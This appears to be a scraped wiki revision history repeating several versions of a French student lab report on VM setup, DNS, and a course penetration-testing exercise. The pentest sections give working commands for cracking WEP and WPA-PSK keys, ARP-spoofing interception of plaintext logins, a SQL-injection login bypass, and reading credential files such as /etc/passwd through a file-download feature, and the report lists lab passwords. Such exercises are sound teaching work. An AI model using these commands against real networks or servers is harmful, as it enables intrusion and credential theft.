En explorant un peu le site, nous trouvons une fonctionnalité qui permet d'importer des fichiers sur la page web et de les télécharger.<br />
<br />
En parallèle de cela, à l'aide de la commande<br />
dirb http://honey.plil.info/<br />
On trouve une page phpmyadmin : http://honey.plil.info/phpmyadmin<br />
<br />
[[Fichier:phpmyadmin.png|center]]<br />
<br />
Encore une page de connexion, il faut donc trouver le login et le password permettant de se connecter à cette page. Cette fois, les injections SQL ne fonctionne pas.<br />
<br />
Cependant, nous avons vu plus tôt que nous pouvions importer et télécharger des fichiers depuis la page web précédente, et en effectuant quelques tests, nous nous sommes rendu compte que ces fichiers provenaient du serveur qui hébergeait le site web.<br />
<br />
En regardant sur internet, nous avons trouvé que le fichier contenant les logins et mot de passes de connexion à la page phpmyadmin se trouvaient dans /etc/phpmyadmin/config-db.php<br />
<br />
Nous uploadons et téléchargeons ce fichier depuis la page web :<br />
<br />
[[Fichier:Config_dbphp.png|center]]<br />
<br />
Nous avons maintenant accès à la page de gestion de la base de données du serveur.<br />
<br />
<br />
Maintenant que l'on sait que l'on peut télécharger des fichiers depuis le serveur, on décide de télécharger le fichier /etc/passwd :<br />
<br />
[[Fichier:Passwd.png|center]]<br />
<br />
==TP ASR==<br />
<br />
===Ajout d'une seconde interface réseau sur la VM===<br />
<br />
On se connecte sur capbreton<br />
ssh root@capbreton<br />
<br />
Et on modifie le fichier de configuration de notre VM (Calicedelamort.cfg) en y ajoutant une deuxième interfaces dans la ligne 'vif'<br />
<br />
nano /etc/xen/Calicedelamort.cfg<br />
<br />
vif = [ 'bridge=IMA5sc, ip=100.64.0.20, mac=00:16:3E:DC:81:A8', 'bridge=bridgeStudents, ip=192.168.42.9 ,mac=00:16:3E:DC:81:A9' ]<br />
<br />
Ensuite, on relance la VM et on modifie le fichier dans /etc/network/interfaces pour y ajouter l'interface réseau eth1 avec la bonne adresse IP<br />
<br />
auto eth1<br />
iface eth1 inet static<br />
address 192.168.42.9<br />
netmask 255.255.255.0<br />
<br />
Pour finir on réalise une masquarade à l'aide de la commande iptables<br />
<br />
iptables -t nat -A POSTROUTING -p tcp -o eth0 -j SNAT --to-source 193.48.57.180 -s 192.168.42.23<br />
<br />
===Ansible===<br />
<br />
Premièrement, on installe ansible sur notre VM sur capbreton<br />
<br />
apt install ansible<br />
<br />
Ensuite, on génère les clefs ssh avec la commande<br />
<br />
ssh-keygen -t rsa<br />
<br />
Puis, on installe la clef publique sur les Vms cibles<br />
<br />
cat .ssh/id_rsa.pub | ssh root@192.168.42.9 "cat >> /root/.ssh/authorized_keys2" (installation sur notre VM chassiron)</div>Pvernierhttps://wiki-ima.plil.fr/mediawiki//index.php?title=TP_sysres_IMA5sc_2020/2021_G9&diff=55119TP sysres IMA5sc 2020/2021 G92020-12-21T16:52:24Z<p>Pvernier : /* Man In The Middle */</p>
<hr />
<div> <br />
==Création de la VM==<br />
<br />
root@capbreton:~# xen-create-image --hostname=Calicedelamort --ip=100.64.0.20 --netmask=255.255.255.240 --password=pasglop --dir=/usr/local/xen --dist=buster --gateway=100.64.0.5<br />
<br />
--- Logical volume ---<br />
LV Path /dev/storage/PaulTanguy1<br />
LV Name PaulTanguy1<br />
VG Name storage<br />
LV UUID Mk2sRM-HJvO-Ul2V-7z4A-WYDR-w2Rs-woO4FD<br />
LV Write Access read/write<br />
LV Creation host, time capbreton, 2020-10-12 17:02:07 +0100<br />
LV Status available<br />
# open 0<br />
LV Size 10.00 GiB<br />
Current LE 2560<br />
Segments 1<br />
Allocation inherit<br />
Read ahead sectors auto<br />
- currently set to 256<br />
Block device 254:24<br />
<br />
--- Logical volume ---<br />
LV Path /dev/storage/PaulTanguy2<br />
LV Name PaulTanguy2<br />
VG Name storage<br />
LV UUID zWVz4u-2u2T-Fd1T-7W5X-G4Fg-M8dO-bEwuEt<br />
LV Write Access read/write<br />
LV Creation host, time capbreton, 2020-10-12 17:02:11 +0100<br />
LV Status available<br />
# open 0<br />
LV Size 10.00 GiB<br />
Current LE 2560<br />
Segments 1<br />
Allocation inherit<br />
Read ahead sectors auto<br />
- currently set to 256<br />
Block device 254:25<br />
<br />
==Services Internet==<br />
<br />
===Serveur SSH===<br />
<br />
On installe simplement un serveur SSH sur la VM.<br />
On modifie le fichier /etc/ssh/sshd_config pour autoriser la connexion en tant que root.<br />
On peut s'y connecter à distance avec la commande suivante :<br />
<br />
ssh root@ns1.calicedelamort.site<br />
<br />
(avec le même mot de passe (pifou) que les machines de TPs)<br />
<br />
===Serveur DNS===<br />
<br />
Dans un premier temps, on loue un nom de domaine sur gandi.net.<br />
Notre nom de domaine est calicedelamort.site<br />
<br />
Ensuite, on installe sur la VM, le paquetage bind9<br />
<br />
Une fois ce paquetage installé, on modifie les fichiers de configuration.<br />
<br />
Dans /etc/bind/db.calicedelamort.site<br />
<br />
;BIND data file for local loopback interface<br />
;<br />
$TTL 604800<br />
@ IN SOA ns1.calicedelamort.site. postmaster.calicedelamort.site. (<br />
3 ; Serial<br />
604800 ; Refresh<br />
86400 ; Retry<br />
2419200 ; Expire<br />
604800 ) ; Negative Cache TTL<br />
;<br />
@ IN NS ns1.calicedelamort.site.<br />
@ IN NS ns6.gandi.net.<br />
@ IN MX 100 ns1<br />
ns1 IN A 193.48.57.180<br />
<br />
Ensuite, dans /etc/bind/named.conf.local<br />
<br />
zone "calicedelamort.site" IN {<br />
type master;<br />
file "/etc/bind/db.calicedelamort.site";<br />
allow-transfer {217.70.177.40;};<br />
};<br />
<br />
<br />
Et enfin, dans /etc/bind/name.conf.options :<br />
<br />
options {<br />
directory "/var/cache/bind";<br />
dnssec-enable yes;<br />
dnssec-validation auto;<br />
listen-on-v6 { any; };<br />
allow-recursion { localhost; };<br />
};<br />
<br />
Pour finir, on se rend sur gandi.net et dans l'option Gluerecords on lie ns1.calicedelamort.site à l'adresse 193.48.57.180.<br />
Puis, on ajoute dans serveurs de noms externes :<br />
<br />
ns1.calicedelamort.site<br />
ns6.gandi.net<br />
<br />
==Tests d'intrusion== <br />
<br />
===Cassage de clef WEP d'un point d'accés Wifi===<br />
<br />
En premier lieu, on installe le paquetage aircrack-ng sur un PC.<br />
<br />
Ensuite, on utilise les commandes suivantes : <br />
<br />
airmon-ng<br />
Cette commande permet d'afficher les interfaces réseau<br />
<br />
[[Fichier:Airmong.PNG|center]]<br />
<br />
airmon-ng start <interface><br />
Pour passer l'interface en mode monitor<br />
<br />
airodump-ng --encrypt wep 'nomInterface'<br />
Pour afficher les réseaux wifi WEP<br />
<br />
[[Fichier:Capture-wep-encrypt.PNG|center]]<br />
<br />
airodump-ng --write 'nomFichier' --channel 3 -bssid '@mac_AP' 'nomInterface'<br />
Pour capturer les paquets émis par le point d'accés ciblé<br />
<br />
aircrack-ng -x 'nomFichier'-01.cap<br />
Pour cracker la clef WEP (à condition d'avoir capturé assez de paquets)<br />
<br />
===Cassage de mot de passe WPA-PSK par force brute===<br />
<br />
Pour cette partie, nous utilisons aussi le paquetage aircrack-ng.<br />
<br />
On utilise les mêmes commandes que précédemment pour trouver les réseaux wifi utilisant WPA-PSK<br />
<br />
airodump-ng --encrypt wpa-psk 'nomInterface'<br />
<br />
airodump-ng --write 'nomFichier' --bssid '@mac_AP' -c 'numChannel' 'nomInterface'<br />
<br />
Une fois que l'on obtient le handshake de point d'accés, on peut essayer de cracker la clef WPA-PSK à l'aide de la commande aircrack-ng<br />
<br />
Cependant, il faut créer un dictionnaire de clef, dans le sujet, nous savons que la clef est composée de 8 chiffres, on crée donc un dictionnaire constitué de toutes les clef à 8 chiffres possible<br />
Pour cela, on utilisa la commande :<br />
crunch 8 8 0123456789 > 'nomDuDico.txt'<br />
<br />
Maintenant, on peut essayer de cracker la clef à l'aide du dictionnaire :<br />
<br />
aircrack-ng -a 2 -w 'nomDuDico.txt' 'nomFichier'-01.cap<br />
<br />
Au bout d'un certain temps, on obtient la clef WPA-PSK permettant de se connecter au point d'accés Wifi.<br />
<br />
[[Fichier:Crack_resultat_WPA.PNG|center]]<br />
<br />
Il est aussi possible de cracker la clef avec hashcat. Cela permet de d'utiliser la puissance du GPU pour brute force la clef. Grace à ma super carte graphique la 2080 super, nous avons pu diviser par 100 le temps du brute force.<br />
La commande est la suivante:<br />
crunch 8 8 0123456789 | hashcat -m 2500 output.hccapx<br />
<br />
===Man In The Middle===<br />
(Homme du milieu en anglais)<br />
<br />
D'abord, sur le eeePC, on modifie le fichier /proc/sys/net/ipv4/ip_forward :<br />
<br />
echo 1 > /proc/sys/net/ipv4/ip_forward<br />
<br />
Ensuite on utilise la commande du paquet dsniff :<br />
<br />
arpspoof -i eth0 -t 172.26.145.254 172.26.145.58<br />
arpspoof -i eth0 -t 172.26.145.58 172.26.145.254<br />
<br />
Enfin, on utilise wireshark pour observer les paquets.<br />
Pour tester l'attaque MiTM, nous avons essayer de nous connecter à un site utilisant un protocole http.<br />
<br />
Sur wireshark, nous avons pu voir, en clair, les identifiants de connexion ainsi que le mot de passe saisi par l'utilisateur.<br />
<br />
[[Fichier:Wiresharck.jpg|center|400px]]<br />
<br />
===Intrusion sur un serveur d'application Web===<br />
<br />
Pour cette partie, on se rend sur le lien http://honey.plil.info.<br />
Nous y trouvons une page de connexion demandant un login et un password.<br />
<br />
N'ayant pas de compte sur ce site, on essaye une simple injection SQL :<br />
Dans les champs 'login' et 'password' on écrit l'injection SQL suivante : " ' OR 1 = 1 -- "<br />
Ca fonctionne ! Nous avons accès aux informations ci-dessous :<br />
<br />
[[Fichier:injectionSQL.PNG|center]]<br />
<br />
Grâce aux informations trouvées à l'aide de l'injection SQL nous pouvons nous connecter en tant qu'administrateur.<br />
En explorant un peu le site, nous trouvons une fonctionnalité qui permet d'importer des fichiers sur la page web et de les télécharger.<br />
<br />
En parallèle de cela, à l'aide de la commande<br />
dirb http://honey.plil.info/<br />
On trouve une page phpmyadmin : http://honey.plil.info/phpmyadmin<br />
<br />
[[Fichier:phpmyadmin.png|center]]<br />
<br />
Encore une page de connexion, il faut donc trouver le login et le password permettant de se connecter à cette page. Cette fois, les injections SQL ne fonctionne pas.<br />
<br />
Cependant, nous avons vu plus tôt que nous pouvions importer et télécharger des fichiers depuis la page web précédente, et en effectuant quelques tests, nous nous sommes rendu compte que ces fichiers provenaient du serveur qui hébergeait le site web.<br />
<br />
En regardant sur internet, nous avons trouvé que le fichier contenant les logins et mot de passes de connexion à la page phpmyadmin se trouvaient dans /etc/phpmyadmin/config-db.php<br />
<br />
Nous uploadons et téléchargeons ce fichier depuis la page web :<br />
<br />
[[Fichier:Config_dbphp.png|center]]<br />
<br />
==TP ASR==<br />
<br />
===Ajout d'une seconde interface réseau sur la VM===<br />
<br />
On se connecte sur capbreton<br />
ssh root@capbreton<br />
<br />
Et on modifie le fichier de configuration de notre VM (Calicedelamort.cfg) en y ajoutant une deuxième interfaces dans la ligne 'vif'<br />
<br />
nano /etc/xen/Calicedelamort.cfg<br />
<br />
vif = [ 'bridge=IMA5sc, ip=100.64.0.20, mac=00:16:3E:DC:81:A8', 'bridge=bridgeStudents, ip=192.168.42.9 ,mac=00:16:3E:DC:81:A9' ]<br />
<br />
Ensuite, on relance la VM et on modifie le fichier dans /etc/network/interfaces pour y ajouter l'interface réseau eth1 avec la bonne adresse IP<br />
<br />
auto eth1<br />
iface eth1 inet static<br />
address 192.168.42.9<br />
netmask 255.255.255.0<br />
<br />
Pour finir on réalise une masquarade à l'aide de la commande iptables<br />
<br />
iptables -t nat -A POSTROUTING -p tcp -o eth0 -j SNAT --to-source 193.48.57.180 -s 192.168.42.23<br />
<br />
===Ansible===<br />
<br />
Premièrement, on installe ansible sur notre VM sur capbreton<br />
<br />
apt install ansible<br />
<br />
Ensuite, on génère les clefs ssh avec la commande<br />
<br />
ssh-keygen -t rsa<br />
<br />
Puis, on installe la clef publique sur les Vms cibles<br />
<br />
cat .ssh/id_rsa.pub | ssh root@192.168.42.9 "cat >> /root/.ssh/authorized_keys2" (installation sur notre VM chassiron)</div>Pvernierhttps://wiki-ima.plil.fr/mediawiki//index.php?title=TP_sysres_IMA5sc_2020/2021_G9&diff=55117TP sysres IMA5sc 2020/2021 G92020-12-21T16:50:05Z<p>Pvernier : /* Man In The Middle */</p>
<hr />
<div> <br />
==Création de la VM==<br />
<br />
root@capbreton:~# xen-create-image --hostname=Calicedelamort --ip=100.64.0.20 --netmask=255.255.255.240 --password=pasglop --dir=/usr/local/xen --dist=buster --gateway=100.64.0.5<br />
<br />
--- Logical volume ---<br />
LV Path /dev/storage/PaulTanguy1<br />
LV Name PaulTanguy1<br />
VG Name storage<br />
LV UUID Mk2sRM-HJvO-Ul2V-7z4A-WYDR-w2Rs-woO4FD<br />
LV Write Access read/write<br />
LV Creation host, time capbreton, 2020-10-12 17:02:07 +0100<br />
LV Status available<br />
# open 0<br />
LV Size 10.00 GiB<br />
Current LE 2560<br />
Segments 1<br />
Allocation inherit<br />
Read ahead sectors auto<br />
- currently set to 256<br />
Block device 254:24<br />
<br />
--- Logical volume ---<br />
LV Path /dev/storage/PaulTanguy2<br />
LV Name PaulTanguy2<br />
VG Name storage<br />
LV UUID zWVz4u-2u2T-Fd1T-7W5X-G4Fg-M8dO-bEwuEt<br />
LV Write Access read/write<br />
LV Creation host, time capbreton, 2020-10-12 17:02:11 +0100<br />
LV Status available<br />
# open 0<br />
LV Size 10.00 GiB<br />
Current LE 2560<br />
Segments 1<br />
Allocation inherit<br />
Read ahead sectors auto<br />
- currently set to 256<br />
Block device 254:25<br />
<br />
==Services Internet==<br />
<br />
===Serveur SSH===<br />
<br />
On installe simplement un serveur SSH sur la VM.<br />
On modifie le fichier /etc/ssh/sshd_config pour autoriser la connexion en tant que root.<br />
On peut s'y connecter à distance avec la commande suivante :<br />
<br />
ssh root@ns1.calicedelamort.site<br />
<br />
(avec le même mot de passe (pifou) que les machines de TPs)<br />
<br />
===Serveur DNS===<br />
<br />
Dans un premier temps, on loue un nom de domaine sur gandi.net.<br />
Notre nom de domaine est calicedelamort.site<br />
<br />
Ensuite, on installe sur la VM, le paquetage bind9<br />
<br />
Une fois ce paquetage installé, on modifie les fichiers de configuration.<br />
<br />
Dans /etc/bind/db.calicedelamort.site<br />
<br />
;BIND data file for local loopback interface<br />
;<br />
$TTL 604800<br />
@ IN SOA ns1.calicedelamort.site. postmaster.calicedelamort.site. (<br />
3 ; Serial<br />
604800 ; Refresh<br />
86400 ; Retry<br />
2419200 ; Expire<br />
604800 ) ; Negative Cache TTL<br />
;<br />
@ IN NS ns1.calicedelamort.site.<br />
@ IN NS ns6.gandi.net.<br />
@ IN MX 100 ns1<br />
ns1 IN A 193.48.57.180<br />
<br />
Ensuite, dans /etc/bind/named.conf.local<br />
<br />
zone "calicedelamort.site" IN {<br />
type master;<br />
file "/etc/bind/db.calicedelamort.site";<br />
allow-transfer {217.70.177.40;};<br />
};<br />
<br />
<br />
Et enfin, dans /etc/bind/name.conf.options :<br />
<br />
options {<br />
directory "/var/cache/bind";<br />
dnssec-enable yes;<br />
dnssec-validation auto;<br />
listen-on-v6 { any; };<br />
allow-recursion { localhost; };<br />
};<br />
<br />
Pour finir, on se rend sur gandi.net et dans l'option Gluerecords on lie ns1.calicedelamort.site à l'adresse 193.48.57.180.<br />
Puis, on ajoute dans serveurs de noms externes :<br />
<br />
ns1.calicedelamort.site<br />
ns6.gandi.net<br />
<br />
==Tests d'intrusion== <br />
<br />
===Cassage de clef WEP d'un point d'accés Wifi===<br />
<br />
En premier lieu, on installe le paquetage aircrack-ng sur un PC.<br />
<br />
Ensuite, on utilise les commandes suivantes : <br />
<br />
airmon-ng<br />
Cette commande permet d'afficher les interfaces réseau<br />
<br />
[[Fichier:Airmong.PNG|center]]<br />
<br />
airmon-ng start <interface><br />
Pour passer l'interface en mode monitor<br />
<br />
airodump-ng --encrypt wep 'nomInterface'<br />
Pour afficher les réseaux wifi WEP<br />
<br />
[[Fichier:Capture-wep-encrypt.PNG|center]]<br />
<br />
airodump-ng --write 'nomFichier' --channel 3 -bssid '@mac_AP' 'nomInterface'<br />
Pour capturer les paquets émis par le point d'accés ciblé<br />
<br />
aircrack-ng -x 'nomFichier'-01.cap<br />
Pour cracker la clef WEP (à condition d'avoir capturé assez de paquets)<br />
<br />
===Cassage de mot de passe WPA-PSK par force brute===<br />
<br />
Pour cette partie, nous utilisons aussi le paquetage aircrack-ng.<br />
<br />
On utilise les mêmes commandes que précédemment pour trouver les réseaux wifi utilisant WPA-PSK<br />
<br />
airodump-ng --encrypt wpa-psk 'nomInterface'<br />
<br />
airodump-ng --write 'nomFichier' --bssid '@mac_AP' -c 'numChannel' 'nomInterface'<br />
<br />
Une fois que l'on obtient le handshake de point d'accés, on peut essayer de cracker la clef WPA-PSK à l'aide de la commande aircrack-ng<br />
<br />
Cependant, il faut créer un dictionnaire de clef, dans le sujet, nous savons que la clef est composée de 8 chiffres, on crée donc un dictionnaire constitué de toutes les clef à 8 chiffres possible<br />
Pour cela, on utilisa la commande :<br />
crunch 8 8 0123456789 > 'nomDuDico.txt'<br />
<br />
Maintenant, on peut essayer de cracker la clef à l'aide du dictionnaire :<br />
<br />
aircrack-ng -a 2 -w 'nomDuDico.txt' 'nomFichier'-01.cap<br />
<br />
Au bout d'un certain temps, on obtient la clef WPA-PSK permettant de se connecter au point d'accés Wifi.<br />
<br />
[[Fichier:Crack_resultat_WPA.PNG|center]]<br />
<br />
Il est aussi possible de cracker la clef avec hashcat. Cela permet de d'utiliser la puissance du GPU pour brute force la clef. Grace à ma super carte graphique la 2080 super, nous avons pu diviser par 100 le temps du brute force.<br />
La commande est la suivante:<br />
crunch 8 8 0123456789 | hashcat -m 2500 output.hccapx<br />
<br />
===Man In The Middle===<br />
(Homme du milieu en anglais)<br />
<br />
D'abord, sur le eeePC, on modifie le fichier /proc/sys/net/ipv4/ip_forward :<br />
<br />
echo 1 > /proc/sys/net/ipv4/ip_forward<br />
<br />
Ensuite on utilise la commande du paquet dsniff :<br />
<br />
arpspoof -i eth0 -t 172.26.145.254 172.26.145.58<br />
arpspoof -i eth0 -t 172.26.145.58 172.26.145.254<br />
<br />
Enfin, on utilise wireshark pour observer les paquets.<br />
Pour tester l'attaque MiTM, nous avons essayer de nous connecter à un site utilisant un protocole http.<br />
<br />
Sur wireshark, nous avons pu voir, en clair, les identifiants de connexion ainsi que le mot de passe saisi par l'utilisateur.<br />
<br />
[[Fichier:Wiresharck.jpg|center]]<br />
<br />
===Intrusion sur un serveur d'application Web===<br />
<br />
Pour cette partie, on se rend sur le lien http://honey.plil.info.<br />
Nous y trouvons une page de connexion demandant un login et un password.<br />
<br />
N'ayant pas de compte sur ce site, on essaye une simple injection SQL :<br />
Dans les champs 'login' et 'password' on écrit l'injection SQL suivante : " ' OR 1 = 1 -- "<br />
Ca fonctionne ! Nous avons accès aux informations ci-dessous :<br />
<br />
[[Fichier:injectionSQL.PNG|center]]<br />
<br />
Grâce aux informations trouvées à l'aide de l'injection SQL nous pouvons nous connecter en tant qu'administrateur.<br />
En explorant un peu le site, nous trouvons une fonctionnalité qui permet d'importer des fichiers sur la page web et de les télécharger.<br />
<br />
En parallèle de cela, à l'aide de la commande<br />
dirb http://honey.plil.info/<br />
On trouve une page phpmyadmin : http://honey.plil.info/phpmyadmin<br />
<br />
[[Fichier:phpmyadmin.png|center]]<br />
<br />
Encore une page de connexion, il faut donc trouver le login et le password permettant de se connecter à cette page. Cette fois, les injections SQL ne fonctionne pas.<br />
<br />
Cependant, nous avons vu plus tôt que nous pouvions importer et télécharger des fichiers depuis la page web précédente, et en effectuant quelques tests, nous nous sommes rendu compte que ces fichiers provenaient du serveur qui hébergeait le site web.<br />
<br />
En regardant sur internet, nous avons trouvé que le fichier contenant les logins et mot de passes de connexion à la page phpmyadmin se trouvaient dans /etc/phpmyadmin/config-db.php<br />
<br />
Nous uploadons et téléchargeons ce fichier depuis la page web :<br />
<br />
[[Fichier:Config_dbphp.png|center]]<br />
<br />
==TP ASR==<br />
<br />
===Ajout d'une seconde interface réseau sur la VM===<br />
<br />
On se connecte sur capbreton<br />
ssh root@capbreton<br />
<br />
Et on modifie le fichier de configuration de notre VM (Calicedelamort.cfg) en y ajoutant une deuxième interfaces dans la ligne 'vif'<br />
<br />
nano /etc/xen/Calicedelamort.cfg<br />
<br />
vif = [ 'bridge=IMA5sc, ip=100.64.0.20, mac=00:16:3E:DC:81:A8', 'bridge=bridgeStudents, ip=192.168.42.9 ,mac=00:16:3E:DC:81:A9' ]<br />
<br />
Ensuite, on relance la VM et on modifie le fichier dans /etc/network/interfaces pour y ajouter l'interface réseau eth1 avec la bonne adresse IP<br />
<br />
auto eth1<br />
iface eth1 inet static<br />
address 192.168.42.9<br />
netmask 255.255.255.0<br />
<br />
Pour finir on réalise une masquarade à l'aide de la commande iptables<br />
<br />
iptables -t nat -A POSTROUTING -p tcp -o eth0 -j SNAT --to-source 193.48.57.180 -s 192.168.42.23<br />
<br />
===Ansible===<br />
<br />
Premièrement, on installe ansible sur notre VM sur capbreton<br />
<br />
apt install ansible<br />
<br />
Ensuite, on génère les clefs ssh avec la commande<br />
<br />
ssh-keygen -t rsa<br />
<br />
Puis, on installe la clef publique sur les Vms cibles<br />
<br />
cat .ssh/id_rsa.pub | ssh root@192.168.42.9 "cat >> /root/.ssh/authorized_keys2" (installation sur notre VM chassiron)</div>Pvernierhttps://wiki-ima.plil.fr/mediawiki//index.php?title=Fichier:Wiresharck.jpg&diff=55115Fichier:Wiresharck.jpg2020-12-21T16:49:00Z<p>Pvernier : </p>
<hr />
<div></div>Pvernierhttps://wiki-ima.plil.fr/mediawiki//index.php?title=TP_sysres_IMA5sc_2020/2021_G9&diff=55114TP sysres IMA5sc 2020/2021 G92020-12-21T16:45:15Z<p>Pvernier : /* Cassage de mot de passe WPA-PSK par force brute */</p>
<hr />
<div> <br />
==Création de la VM==<br />
<br />
root@capbreton:~# xen-create-image --hostname=Calicedelamort --ip=100.64.0.20 --netmask=255.255.255.240 --password=pasglop --dir=/usr/local/xen --dist=buster --gateway=100.64.0.5<br />
<br />
--- Logical volume ---<br />
LV Path /dev/storage/PaulTanguy1<br />
LV Name PaulTanguy1<br />
VG Name storage<br />
LV UUID Mk2sRM-HJvO-Ul2V-7z4A-WYDR-w2Rs-woO4FD<br />
LV Write Access read/write<br />
LV Creation host, time capbreton, 2020-10-12 17:02:07 +0100<br />
LV Status available<br />
# open 0<br />
LV Size 10.00 GiB<br />
Current LE 2560<br />
Segments 1<br />
Allocation inherit<br />
Read ahead sectors auto<br />
- currently set to 256<br />
Block device 254:24<br />
<br />
--- Logical volume ---<br />
LV Path /dev/storage/PaulTanguy2<br />
LV Name PaulTanguy2<br />
VG Name storage<br />
LV UUID zWVz4u-2u2T-Fd1T-7W5X-G4Fg-M8dO-bEwuEt<br />
LV Write Access read/write<br />
LV Creation host, time capbreton, 2020-10-12 17:02:11 +0100<br />
LV Status available<br />
# open 0<br />
LV Size 10.00 GiB<br />
Current LE 2560<br />
Segments 1<br />
Allocation inherit<br />
Read ahead sectors auto<br />
- currently set to 256<br />
Block device 254:25<br />
<br />
==Services Internet==<br />
<br />
===Serveur SSH===<br />
<br />
On installe simplement un serveur SSH sur la VM.<br />
On modifie le fichier /etc/ssh/sshd_config pour autoriser la connexion en tant que root.<br />
On peut s'y connecter à distance avec la commande suivante :<br />
<br />
ssh root@ns1.calicedelamort.site<br />
<br />
(avec le même mot de passe (pifou) que les machines de TPs)<br />
<br />
===Serveur DNS===<br />
<br />
Dans un premier temps, on loue un nom de domaine sur gandi.net.<br />
Notre nom de domaine est calicedelamort.site<br />
<br />
Ensuite, on installe sur la VM, le paquetage bind9<br />
<br />
Une fois ce paquetage installé, on modifie les fichiers de configuration.<br />
<br />
Dans /etc/bind/db.calicedelamort.site<br />
<br />
;BIND data file for local loopback interface<br />
;<br />
$TTL 604800<br />
@ IN SOA ns1.calicedelamort.site. postmaster.calicedelamort.site. (<br />
3 ; Serial<br />
604800 ; Refresh<br />
86400 ; Retry<br />
2419200 ; Expire<br />
604800 ) ; Negative Cache TTL<br />
;<br />
@ IN NS ns1.calicedelamort.site.<br />
@ IN NS ns6.gandi.net.<br />
@ IN MX 100 ns1<br />
ns1 IN A 193.48.57.180<br />
<br />
Ensuite, dans /etc/bind/named.conf.local<br />
<br />
zone "calicedelamort.site" IN {<br />
type master;<br />
file "/etc/bind/db.calicedelamort.site";<br />
allow-transfer {217.70.177.40;};<br />
};<br />
<br />
<br />
Et enfin, dans /etc/bind/name.conf.options :<br />
<br />
options {<br />
directory "/var/cache/bind";<br />
dnssec-enable yes;<br />
dnssec-validation auto;<br />
listen-on-v6 { any; };<br />
allow-recursion { localhost; };<br />
};<br />
<br />
Pour finir, on se rend sur gandi.net et dans l'option Gluerecords on lie ns1.calicedelamort.site à l'adresse 193.48.57.180.<br />
Puis, on ajoute dans serveurs de noms externes :<br />
<br />
ns1.calicedelamort.site<br />
ns6.gandi.net<br />
<br />
==Tests d'intrusion== <br />
<br />
===Cassage de clef WEP d'un point d'accés Wifi===<br />
<br />
En premier lieu, on installe le paquetage aircrack-ng sur un PC.<br />
<br />
Ensuite, on utilise les commandes suivantes : <br />
<br />
airmon-ng<br />
Cette commande permet d'afficher les interfaces réseau<br />
<br />
[[Fichier:Airmong.PNG|center]]<br />
<br />
airmon-ng start <interface><br />
Pour passer l'interface en mode monitor<br />
<br />
airodump-ng --encrypt wep 'nomInterface'<br />
Pour afficher les réseaux wifi WEP<br />
<br />
[[Fichier:Capture-wep-encrypt.PNG|center]]<br />
<br />
airodump-ng --write 'nomFichier' --channel 3 -bssid '@mac_AP' 'nomInterface'<br />
Pour capturer les paquets émis par le point d'accés ciblé<br />
<br />
aircrack-ng -x 'nomFichier'-01.cap<br />
Pour cracker la clef WEP (à condition d'avoir capturé assez de paquets)<br />
<br />
===Cassage de mot de passe WPA-PSK par force brute===<br />
<br />
Pour cette partie, nous utilisons aussi le paquetage aircrack-ng.<br />
<br />
On utilise les mêmes commandes que précédemment pour trouver les réseaux wifi utilisant WPA-PSK<br />
<br />
airodump-ng --encrypt wpa-psk 'nomInterface'<br />
<br />
airodump-ng --write 'nomFichier' --bssid '@mac_AP' -c 'numChannel' 'nomInterface'<br />
<br />
Une fois que l'on obtient le handshake de point d'accés, on peut essayer de cracker la clef WPA-PSK à l'aide de la commande aircrack-ng<br />
<br />
Cependant, il faut créer un dictionnaire de clef, dans le sujet, nous savons que la clef est composée de 8 chiffres, on crée donc un dictionnaire constitué de toutes les clef à 8 chiffres possible<br />
Pour cela, on utilisa la commande :<br />
crunch 8 8 0123456789 > 'nomDuDico.txt'<br />
<br />
Maintenant, on peut essayer de cracker la clef à l'aide du dictionnaire :<br />
<br />
aircrack-ng -a 2 -w 'nomDuDico.txt' 'nomFichier'-01.cap<br />
<br />
Au bout d'un certain temps, on obtient la clef WPA-PSK permettant de se connecter au point d'accés Wifi.<br />
<br />
[[Fichier:Crack_resultat_WPA.PNG|center]]<br />
<br />
Il est aussi possible de cracker la clef avec hashcat. Cela permet de d'utiliser la puissance du GPU pour brute force la clef. Grace à ma super carte graphique la 2080 super, nous avons pu diviser par 100 le temps du brute force.<br />
La commande est la suivante:<br />
crunch 8 8 0123456789 | hashcat -m 2500 output.hccapx<br />
<br />
===Man In The Middle===<br />
(Homme du milieu en anglais)<br />
<br />
D'abord, sur le eeePC, on modifie le fichier /proc/sys/net/ipv4/ip_forward :<br />
<br />
echo 1 > /proc/sys/net/ipv4/ip_forward<br />
<br />
Ensuite on utilise la commande du paquet dsniff :<br />
<br />
arpspoof -i eth0 -t 172.26.145.254 172.26.145.58<br />
arpspoof -i eth0 -t 172.26.145.58 172.26.145.254<br />
<br />
Enfin, on utilise wireshark pour observer les paquets.<br />
Pour tester l'attaque MiTM, nous avons essayer de nous connecter à un site utilisant un protocole http.<br />
<br />
Sur wireshark, nous avons pu voir, en clair, les identifiants de connexion ainsi que le mot de passe saisi par l'utilisateur.<br />
<br />
(photo)<br />
<br />
===Intrusion sur un serveur d'application Web===<br />
<br />
Pour cette partie, on se rend sur le lien http://honey.plil.info.<br />
Nous y trouvons une page de connexion demandant un login et un password.<br />
<br />
N'ayant pas de compte sur ce site, on essaye une simple injection SQL :<br />
Dans les champs 'login' et 'password' on écrit l'injection SQL suivante : " ' OR 1 = 1 -- "<br />
Ca fonctionne ! Nous avons accès aux informations ci-dessous :<br />
<br />
[[Fichier:injectionSQL.PNG|center]]<br />
<br />
Grâce aux informations trouvées à l'aide de l'injection SQL nous pouvons nous connecter en tant qu'administrateur.<br />
En explorant un peu le site, nous trouvons une fonctionnalité qui permet d'importer des fichiers sur la page web et de les télécharger.<br />
<br />
En parallèle de cela, à l'aide de la commande<br />
dirb http://honey.plil.info/<br />
On trouve une page phpmyadmin : http://honey.plil.info/phpmyadmin<br />
<br />
[[Fichier:phpmyadmin.png|center]]<br />
<br />
==TP ASR==<br />
<br />
===Ajout d'une seconde interface réseau sur la VM===<br />
<br />
On se connecte sur capbreton<br />
ssh root@capbreton<br />
<br />
Et on modifie le fichier de configuration de notre VM (Calicedelamort.cfg) en y ajoutant une deuxième interfaces dans la ligne 'vif'<br />
<br />
nano /etc/xen/Calicedelamort.cfg<br />
<br />
vif = [ 'bridge=IMA5sc, ip=100.64.0.20, mac=00:16:3E:DC:81:A8', 'bridge=bridgeStudents, ip=192.168.42.9 ,mac=00:16:3E:DC:81:A9' ]<br />
<br />
Ensuite, on relance la VM et on modifie le fichier dans /etc/network/interfaces pour y ajouter l'interface réseau eth1 avec la bonne adresse IP<br />
<br />
auto eth1<br />
iface eth1 inet static<br />
address 192.168.42.9<br />
netmask 255.255.255.0<br />
<br />
Pour finir on réalise une masquarade à l'aide de la commande iptables<br />
<br />
